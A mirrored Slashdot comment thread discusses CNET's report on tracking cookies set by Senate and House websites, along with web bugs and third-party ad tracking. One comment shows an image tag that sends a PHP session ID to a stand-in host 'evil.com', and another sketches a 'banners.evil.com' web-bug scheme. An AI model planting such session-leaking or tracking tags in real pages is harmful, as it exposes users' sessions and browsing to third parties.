Slashdot Mirror
More Cookie Investigations
FancyKetchup writes "This time, C|Net is caught up in cookie paranoia with their 'special investigation' into use of cookies on the Senate and House representative websites." From the article: "Sen. John McCain, R-Ariz., for instance, has been a longtime advocate of strict privacy laws to restrict commercial Web sites' data collection practices. In a statement posted on his own Web site, McCain assures visitors that 'I do not use 'cookies' or other means on my Web site to track your visit in any way.' But visiting mccain.senate.gov implants a cookie on the visitor's PC that will not expire until 2035. " Follow up to a story we reported on earlier.
It's less scary after factorization: The cookie will not expire until 5*11*37.
Can anyone direct me to an easy way to get a "wipe cookies" button in my Firefox toolbar? Perhaps something to make deleting all of my cookies as easy as hitting "refresh" while looking at a high school website?
Trying to use sarcasm in text-based forums does not work.
"Secondly, whats all the fuss about? Cookies are incredibly harmless compared to everything else floating around the internets. Right?"
wrong wrong wrong.
First just because there there is a lot of other things floating araound, doesn't mean things percieved as minor should be ignored.
Do you know what started the 'don't track cookies' effort withing the government? The white house was tracking people who had cookies from a marijuana advocacy site.
The Kruger Dunning explains most post on
I cleared all cookies and went to mccain.senate.gov - checked the cookies and nothing. Anyone else?
My point was that you don't need cookies enabled to have your username and password filled in for you, that was it. What's the problem?
Guy asked me for a quarter for a cup of coffee. So I bit him.
some developers to avoid even session cookies by using URL strings instead
x y"%gt;
Yes, that is what I was thinking. We all love PHP right? And those long unique autogenerated PHPSESSIONIDs are perfect for cross site information transfer.
<img src="http://evil.com/foo.jpg?PHPSESSIONID=xyxxyxy
These are done in spam mail all the time. I'm not sure if mail programs by default still show images, but it is common for them to have images that have appended your email address in some way to verify you got the message for more spam your way!
Now we can look at anybody's phone records, I'm not sure how much different this is. Actually, there is so much of everybody's personal information floating around for sale, I would bet that the supply outweighs the demand. I mean, besides the dumbass marketing folks that already fill up my mailbox with deceiving checks and other things that sometimes look important, who has the time or desire to spy on people that much?
Should I be more paranoid? I'm fairly paranoid already, but I can beef it up a bit if necessary.
Sorry, I dont have that directory emtry, I do not install Flash and have no need for sites that insist on it as the only navigation option. With very few exceptions, a website should be inanimate. If there is a justifiable reason for a Flash content, there is not enough justification for using it on the front page, it should be buried deeper in the site with a resonable HTTP alternative. I do not have a compelling need for dropdown menus and other useless eyecandy, a hyperlink works just fine for me. I find it annoying that they are trying to use MY computer to relieve THEIR server load, the same goes for Java. A site needs a double plus good reason for me to add them to my Java whitelist, even so I add a site with a great deal of distaste and distrust. After all, some marketing droid has probably has probably stuck his fingers in the development and one must always suspect the motives of such.
There is no right to feel safe thru security vaudeville at the expense of everyone's freedom, privacy and tax money.
Hahahah, funny.... from the link: html> title>Ook!/title> body> Sorry, links to Bugzilla from Slashdot are disabled. /body> /html>
neat
well I was close. My memory is failing.
g ency.privacy.ap/index.html
t ml?tw=rss.index
- 06-20-00&cat=AN
http://www.cnn.com/2005/TECH/internet/12/29/spy.a
relevant quote:
"The government first issued strict rules on cookies in 2000 after disclosures that the White House drug policy office had used the technology to track computer users viewing its online anti-drug advertising. Even a year later, a congressional study found 300 cookies still on the Web sites of 23 agencies."
however it still makes my point on one way a cookie can be used for malice.
http://www.wired.com/news/wireservice/0,69945-0.h
shows how cookies can be used to trace you through the web, as it were.
http://shns.scripps.com/shns/story.cfm?pk=COOKIES
"White House ads offering information on marijuana pop up when Internet users search for certain words connected to drugs on Internet search engines like AltaVista or Lycos. The banner ads steer users to the anti-drug site Freevibe.com, which is operated by the White House drug office. A tracking cookie is inserted in the user's personal computer as the site is activated.
Although Freevibe's privacy notice states that "no information, including your e-mail address, will be sold or distributed to any other organization," the site is connected Doubleclick.com. Officials of Doubleclick, a New York advertising firm that is one of the largest companies gathering data on Internet user use, told the Senate Commerce Committee last week it is developing new products that will profile more than 40 million Internet users."
here is an example where your information is tracked and sold.
I won't go into wether or not these particular cases where intended to abuse anyone, but it would be just as easy to use this data for profiling.
Would it be hard to imagine someone thinking "Well, if they are looking for ways to kick a drug habit, then they probable have drugs. Lets go arrest them!"?
oddly, I can't find the story that I heard about it originally.
The Kruger Dunning explains most post on
The trick is that the cookie can be linked to your personal information.
The class "compromising cookie" scenario involves a cookie set by an embedded image from a different server.
Say that Evil, Inc runs a banner server banners.evil.com, which puts ads on kinky.xxx and on yourchurch.org (or maybe just an invisible "web bug" on either site). When you visit kinky.xxx, your browser requests the banner from banners.evil.com, which sets a cookie saying "I went to kinky.xxx and all I got was this lousy cookie". That cookie will be sent along with any request your browser makes to banners.evil.com.
Then you log in to yourchurch.org. Their home page has an image tag with a source like "http://banners.evil.com/spyonme.php?username=your name". Your browser makes this request to banners.evil.com, sending along the cookie that server set eariler. Your browser thus tells Evil, Inc your yourchurch.org username (in the image URL) and the fact the you visited kinky.xxx (in the cookie it).
Evil, Inc phones up your pastor and lets him know so that he can shame you in front of the parish the next Sunday (turns out this is all part of your church's anti-porn crusade).
Tom Swiss | the infamous tms | my blog
You cannot wash away blood with blood
I suspect that I fall into the category dismissed as paranoid, but I think there are two things that really bother me about the use of cookies:
1) The fact that I can't understand the data contained in the cookie. Granted, I realize this is because in the early days of cookies, the info was saved as simple text and that was a huge security risk. I understand that personal data has to be encrypted for the sake of security, but other than personal data, I would like other data to not be gibberish. However, it appears all cookies are incomprehensible gibberish to me, and that makes me less trustful of them. I realize that this is not a consistent position. I can't read or understand the code that runs my computer, but I don't resent this the same way I do cookies. My distrust of cookies goes back to the early "abuses" of Doubleclick and their ilk, and this has left me less than receptive to cookies in general.
I always block cookies from every site I visit as a matter of habit because of the early cookie "abuses." If a site does not work properly because I have blocked its cookies, then I decide whether the content/service is valuable enough to me to allow the cookies--even then, I never allow persistent cookies. I simply don't understand why any site needs to set cookies that are valid until 2035. That strikes me as incredibly intrusive.
If all I want to do is browse content and the site does not function without cookies, then I leave the site, usually cursing under my breath or out loud if it was a particularly stupid cookie use.
2) What is even more heinous in my mind is the number of cookies thrown at you from domains outside of the one you are technically visiting. Granted, I always block third party cookies, but when I review (via adblock) the amount of crap being pumped into my browser that does not originate from the site I'm actually visiting (such as from google-analytics.com and a.as-us.falkag.net on the page where I'm typing this right now) and some of this content is delivered attached to a 1x1 invisible pixel, I can't help but wonder why sites are trying to hide from me what they are trying to do. And, of course, cookies are usually attached to these invisible intrusions.
Perhaps I would be less suspicious if I understood what was being accomplished, but the mere fact that it appears that these companies are trying to hide what they are doing makes me suspicious of their intent.
Does that qualify me for a tinfoil hat? Hmmm---perhaps I shouldn't ask that question here...